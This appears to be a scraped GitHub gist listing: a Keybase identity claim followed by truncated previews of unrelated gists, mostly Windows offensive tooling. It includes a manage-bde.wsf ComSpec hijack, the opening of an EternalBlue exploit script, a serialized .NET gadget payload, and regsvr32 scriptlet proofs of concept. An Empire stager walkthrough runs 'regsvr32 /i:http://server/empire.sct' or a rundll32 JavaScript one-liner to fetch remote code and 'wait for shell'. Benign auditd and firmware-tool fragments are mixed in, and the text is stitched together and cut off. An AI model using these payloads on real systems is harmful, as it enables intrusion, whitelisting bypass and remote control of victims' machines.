I hereby claim:
- I am coh7eiqu8thaBu on github.
- I am jeromepoggi (https://keybase.io/jeromepoggi) on keybase.
- I have a public key whose fingerprint is C34A C116 1AA2 84AD 2592 1F98 FBB0 84A0 34AF BB17
To claim this, I am signing this object:
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
Here are a few examples that you may or may not find useful - | |
1) Replace ComSpec Variable | |
set comspec=c:\windows\system32\calc.exe | |
cscript manage-bde.wsf |
# Linux Audit Daemon - Best Practice Configuration | |
# /etc/audit/audit.rules | |
# | |
# Based on rules published here: | |
# Gov.uk auditd rules | |
# https://github.com/gds-operations/puppet-auditd/pull/1 | |
# CentOS 7 hardening | |
# https://highon.coffee/blog/security-harden-centos-7/#auditd---audit-daemon | |
# Linux audit repo | |
# https://github.com/linux-audit/audit-userspace/tree/master/rules |
/* | |
* SEP firmware split tool | |
* | |
* Copyright (c) 2017 xerub | |
*/ | |
#include <fcntl.h> | |
#include <stddef.h> | |
#include <stdio.h> | |
#include <stdlib.h> |
I hereby claim:
To claim this, I am signing this object:
H4sIAHWR0lkAA+2963obx7Eomr+a7zxEG2YWyRUAJEjRsknTCURCEmLeQpCWFVGf | |
NAAGxETADDIzIAknPu9znuM8zX6LU7e+DQaS7HglZ39bWCsWiOnpS3V13at6Gr6P | |
8mgyauw0W829rd/9T3y24fNkb4/+hU/5X/re2n6y+2Tv8e6Tx7u/227tbO+0fqf2 | |
/kdmU/rM8yLMlPpdlqbFh9p97Pn/pp+pv//6z2brNxwDN/irx49X7f/u450nZv8f | |
twBPWrtfPXn8O7X9G85h5ef/8P1vXr1QNb3rNVVrwf8QFR7XgmYPHp21Tzu1QDdQ | |
Nw3VTtS8iCdxsVBFqm6jJMrCIlKERNFDkYWDIuxPIhVmg3F8F+VN7qj36uyq/SP0 | |
enKhguZTZbp8fTPqprMiTpP8ZnTxRr/3dhhnahRPordJOI3UJOxHE3oR2+OeFfPZ | |
23yQxbOCXsOfw+yW+uARjzu9o8vuxVX3/EyGvRrHuZpl6W0WThV8DdUoiyK18fzi | |
ZNMsahjl8W0SDXF1gyyqXFugFwcdpFPoByYbDYo0WzRhjv2MJ3BOY/fM4JEapZNJ | |
eh8nt0pWDKuF7uezWZoV0bAp0Lm6UK09XGvjrq4ajbsoy6FxcJHFSZGrdF6oAjoz |
#!/usr/bin/python | |
from impacket import smb | |
from struct import pack | |
import os | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Empire" | |
progid="Empire" | |
version="1.00" | |
classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
> | |
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
1. Create Empire Listener | |
2. Generate Stager | |
3. Host Stager Code At Some URL | |
4. Host .sct File At Some URL | |
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
7. Wait for Shell... |